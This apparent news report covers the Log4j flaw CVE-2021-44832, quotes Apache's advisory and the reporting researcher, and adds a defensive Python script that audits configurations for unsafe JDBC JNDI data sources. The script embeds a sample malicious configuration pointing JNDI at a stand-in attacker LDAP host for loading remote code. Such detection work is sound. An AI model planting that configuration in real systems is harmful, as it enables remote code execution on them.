New Apache Log4j Update Patch Released for Newly Discovered Vulnerability

The Apache Software Foundation (ASF) released a new Log4j update on Tuesday to address a newly discovered vulnerability. The flaw allows arbitrary code execution on affected systems, and it is the fifth security issue found in the logging library in the span of a month.

The vulnerability is tracked as CVE-2021-44832 and carries a CVSS severity score of 6.6 out of 10. It affects all versions of the library from 2.0-beta7 through 2.17.0, with the exception of the security-fix releases 2.3.2 and 2.12.4. Log4j 1.x is not affected. Users are advised to upgrade to Log4j 2.3.2 (for Java 6), 2.12.4 (for Java 7), or 2.17.1 (for Java 8 and later).

The ASF in an advisory said, “Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4) are vulnerable to a remote code execution (RCE) attack where an attacker with permission to modify the logging configuration file can construct a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI which can execute remote code. This issue is fixed by limiting JNDI data source names to the java protocol in Log4j2 versions 2.17.1, 2.12.4, and 2.3.2.”

Checkmarx security researcher Yaniv Nizry is credited with reporting the vulnerability to Apache on December 27.

According to Nizry, “The complexity of this vulnerability is higher than the original CVE-2021-44228 since it requires the attacker to have control over the configuration. Unlike Logback, in Log4j there is a feature to load a remote configuration file or to configure the logger through the code, so an arbitrary code execution could be achieved with [an] MitM attack, user input ending up in a vulnerable configuration variable, or modifying the config file.”
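The condition the ASF advisory and Nizry both describe is a JDBC Appender whose DataSource names a JNDI URI outside the java: namespace, reachable only by someone who already controls the configuration file (or the remote location it is loaded from). The following is an added example, not code from the page or from the Log4j project: a small audit script that parses Log4j 2 XML configurations and flags exactly that pattern, using the same rule the fixed releases enforce (data source names confined to the java protocol). Both configurations are constructed for illustration, and attacker.example is a hypothetical host.

```python
"""Audit Log4j 2 XML configurations for JDBC appenders whose DataSource
uses a JNDI name outside the java: protocol (the CVE-2021-44832 pattern).

Added example: not from the page or the Log4j project. Sample configs are
constructed; attacker.example is a hypothetical host.
"""
import xml.etree.ElementTree as ET
from typing import List, Tuple

# Constructed sample: what an attacker who controls the logging configuration
# would plant. The DataSource points JNDI at an attacker-run LDAP server.
MALICIOUS_CONFIG = """<?xml version="1.0" encoding="UTF-8"?>
<Configuration status="WARN">
  <Appenders>
    <JDBC name="dbAppender" tableName="application_log">
      <DataSource jndiName="ldap://attacker.example:1389/Exploit"/>
      <Column name="message" pattern="%m"/>
    </JDBC>
  </Appenders>
  <Loggers>
    <Root level="info"><AppenderRef ref="dbAppender"/></Root>
  </Loggers>
</Configuration>
"""

# Constructed sample: the legitimate form, with the data source looked up in
# the container's java: namespace. This is the only form 2.17.1, 2.12.4 and
# 2.3.2 still accept.
BENIGN_CONFIG = """<?xml version="1.0" encoding="UTF-8"?>
<Configuration status="WARN">
  <Appenders>
    <JDBC name="dbAppender" tableName="application_log">
      <DataSource jndiName="java:comp/env/jdbc/LoggingDataSource"/>
      <Column name="message" pattern="%m"/>
    </JDBC>
  </Appenders>
  <Loggers>
    <Root level="info"><AppenderRef ref="dbAppender"/></Root>
  </Loggers>
</Configuration>
"""


def _attr(elem: ET.Element, name: str) -> str:
    """Case-insensitive attribute lookup; Log4j 2 ignores case in its config."""
    for key, value in elem.attrib.items():
        if key.lower() == name.lower():
            return value
    return ""


def find_jndi_datasources(xml_text: str) -> List[Tuple[str, str]]:
    """Return (appender name, jndiName) for every JDBC appender with a DataSource.

    Element names are compared case-insensitively because Log4j 2 accepts
    <JDBC>, <Jdbc> or <jdbc> interchangeably.
    """
    root = ET.fromstring(xml_text)
    found: List[Tuple[str, str]] = []
    for elem in root.iter():
        if elem.tag.lower() != "jdbc":
            continue
        appender = _attr(elem, "name") or "<unnamed>"
        for child in elem:
            if child.tag.lower() == "datasource":
                jndi = _attr(child, "jndiName")
                if jndi:
                    found.append((appender, jndi))
    return found


def is_unsafe_jndi_name(jndi_name: str) -> bool:
    """True unless the name is confined to the java: protocol, mirroring the
    restriction the fixed releases apply to JDBC data source names."""
    return not jndi_name.strip().startswith("java:")


def audit(xml_text: str) -> List[str]:
    """One finding per JDBC DataSource whose jndiName is not java:-scoped."""
    return [
        f"appender {name!r}: DataSource jndiName {jndi!r} is not confined to java:"
        for name, jndi in find_jndi_datasources(xml_text)
        if is_unsafe_jndi_name(jndi)
    ]


if __name__ == "__main__":
    for label, cfg in (("malicious", MALICIOUS_CONFIG), ("benign", BENIGN_CONFIG)):
        findings = audit(cfg)
        print(f"{label}: {len(findings)} finding(s)")
        for finding in findings:
            print("  " + finding)
```

Run it against the XML configuration files your deployments actually load. A hit on a patched release is harmless, since the library now refuses the lookup, but on 2.17.0 or earlier it is the exact precondition for this CVE, and it is worth asking how that configuration got there. Nizry's point about remote configuration loading also applies: a system property or environment variable that sets the configuration location to an http: URL is a separate exposure this script does not check for.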

With this latest fix, the project maintainers have now addressed four issues in Log4j 2 since the Log4Shell flaw came to light earlier this month. One further vulnerability, affecting the end-of-life Log4j 1.2 branch, has no patch:

  • CVE-2021-44228 (CVSS score: 10.0) – A remote code execution vulnerability affecting Log4j versions from 2.0-beta9 to 2.14.1 (Fixed in version 2.15.0)
  • CVE-2021-45046 (CVSS score: 9.0) – An information leak and remote code execution vulnerability affecting Log4j versions from 2.0-beta9 to 2.15.0, excluding 2.12.2 (Fixed in version 2.16.0)
  • CVE-2021-45105 (CVSS score: 7.5) – A denial-of-service vulnerability affecting Log4j versions from 2.0-beta9 to 2.16.0 (Fixed in version 2.17.0)
  • CVE-2021-4104 (CVSS score: 8.1) – An untrusted deserialization flaw affecting Log4j version 1.2 (No fix available; Upgrade to version 2.17.1)
